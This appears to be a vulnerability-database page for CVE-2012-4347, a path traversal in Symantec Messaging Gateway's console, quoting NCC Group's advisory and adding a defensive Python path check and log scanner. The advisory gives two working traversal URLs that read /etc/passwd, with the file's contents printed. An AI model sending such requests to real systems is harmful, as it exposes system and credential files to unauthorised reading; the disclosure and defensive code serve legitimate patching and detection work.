CVE-2012-4347: Detail

CVE-2012-4347

Directory Traversal
A01-Broken Access Control
83.32%V3
Network
2012-12-05
10h00 +00:00
2012-12-20
09h00 +00:00

CVE Descriptions

Multiple directory traversal vulnerabilities in the management console in Symantec Messaging Gateway (SMG) 9.5.x allow remote authenticated users to read arbitrary files via a .. (dot dot) in the (1) logFile parameter in a logs action to brightmail/export or (2) localBackupFileSelection parameter in an APPLIANCE restoreSource action to brightmail/admin/restore/download.do.

CVE Information

Related Weaknesses

CWE-ID / Weakness Name / Source
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

Metrics

Metric / Score / Severity / CVSS Vector / Source
V2 5 AV:N/AC:L/Au:N/C:P/I:N/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood that a vulnerability will be exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that the vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of all other CVEs. The percentile therefore compares one CVE's EPSS score against those of other CVEs.

Exploit Information

Exploit Database EDB-ID: 23110

Publication date: 2012-12-02 23h00 +00:00
Author: Ben Williams
EDB Verified: No

=======
Summary
=======
Name: Symantec Messaging Gateway - Arbitrary file download is possible with a crafted URL (authenticated)
Release Date: 30 November 2012
Reference: NGS00266
Discoverer: Ben Williams <ben.williams@ngssecure.com>
Vendor: Symantec
Vendor Reference:
Systems Affected: Symantec Messaging Gateway 9.5.3-3
Risk: Medium
Status: Published

========
TimeLine
========
Discovered: 17 April 2012
Released: 17 April 2012
Approved: 29 April 2012
Reported: 30 April 2012
Fixed: 27 August 2012
Published: 30 November 2012

===========
Description
===========
I. VULNERABILITY
-------------------------
Symantec Messaging Gateway 9.5.3-3 - Arbitrary file download is possible with a crafted URL (authenticated)

II. BACKGROUND
-------------------------
Symantec Messaging Gateway 9.5.3-3 is the latest version of their Email Security Appliance

III. DESCRIPTION
-------------------------
The vulnerability would enable an attacker (who has authenticated to the web interface) to download arbitrary files from the appliance with the permissions of the Webserver user

=================
Technical Details
=================
IV. PROOF OF CONCEPT
-------------------------
Various files containing sensitive information can be downloaded using a crafted URL, for example:

http://192.168.1.59:41080/brightmail/export?type=logs&logFile=../../../etc/passwd&logType=1&browserType=1

Which produces a file containing:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
postfix:x:100:101::/home/postfix:/bin/bash
mailwall:x:500:501::/home/mailwall:/bin/bash
mysql:x:501:103::/home/mysql:/bin/bash
bcc:x:502:99::/home/bcc:/bin/bash
support:x:503:503::/home/support:/bin/bash
admin:x:504:501::/home/admin:/bin/rbash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin

Similar issues can be seen in other places such as here:

http://192.168.1.59:41080/brightmail/admin/restore/download.do?no-cache=false&displayTab=restore&restoreSource=APPLIANCE&localBackupFileSelection=../../etc/passwd

===============
Fix Information
===============
An updated version of the software has been released to address the vulnerability:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120827_00

NCC Group Research
http://www.nccgroup.com/research
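As an added defensive example (not Symantec's code and not part of the advisory), the block below shows the CWE-22 mitigation the advisory's fix implies and a matching log check: `resolve_under_root` maps a user-supplied file name onto a fixed export directory and refuses anything that resolves outside it, and `traversal_param` flags console request URLs whose `logFile` or `localBackupFileSelection` value (the two parameters in the CVE description) carries a `..` segment or an absolute path. The export root directory is a constructed assumption; the sample URL is the advisory's own.

```python
import tempfile
from pathlib import Path
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed stand-in for the directory the export action should serve files from (assumption).
EXPORT_ROOT = Path(tempfile.gettempdir()) / "smg-export-root"

# The two request parameters named in the CVE-2012-4347 description.
TRAVERSAL_PARAMS = ("logFile", "localBackupFileSelection")


def resolve_under_root(user_name: str, root: Path = EXPORT_ROOT) -> Optional[Path]:
    """Map a user-supplied file name to a path under root, or return None if it escapes.

    Both sides are fully resolved ('..' and symlinks collapsed) before comparing, so a name
    such as '../../../etc/passwd' or an absolute '/etc/passwd' cannot pass the check.
    """
    if not user_name or "\x00" in user_name:
        return None
    root_real = root.resolve()
    # Joining discards root when user_name is absolute; the prefix check below catches that too.
    candidate = (root / user_name).resolve()
    try:
        candidate.relative_to(root_real)
    except ValueError:
        return None  # resolved outside the permitted directory
    return candidate


def traversal_param(url: str) -> Optional[str]:
    """Return the first vulnerable parameter whose value has a '..' segment or is absolute.

    Meant for scanning web-server access logs for the request shapes shown in the advisory;
    values are decoded a second time so double URL-encoding does not hide the sequence.
    """
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for name in TRAVERSAL_PARAMS:
        for raw in query.get(name, []):
            value = unquote(raw).replace("\\", "/")
            if value.startswith("/") or ".." in value.split("/"):
                return name
    return None


if __name__ == "__main__":
    # Request line taken from the advisory's first PoC URL.
    poc = "http://192.168.1.59:41080/brightmail/export?type=logs&logFile=../../../etc/passwd&logType=1&browserType=1"
    print(traversal_param(poc), resolve_under_root("../../../etc/passwd"), resolve_under_root("mail.log"))
```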

Products Mentioned

Configuration 0

Symantec>>Messaging_gateway >> Version 9.5

Symantec>>Messaging_gateway >> Version 9.5.1

Symantec>>Messaging_gateway >> Version 9.5.2

Symantec>>Messaging_gateway >> Version 9.5.3

Symantec>>Messaging_gateway >> Version 9.5.4

References

http://www.securityfocus.com/bid/56789
Tags: vdb-entry, x_refsource_BID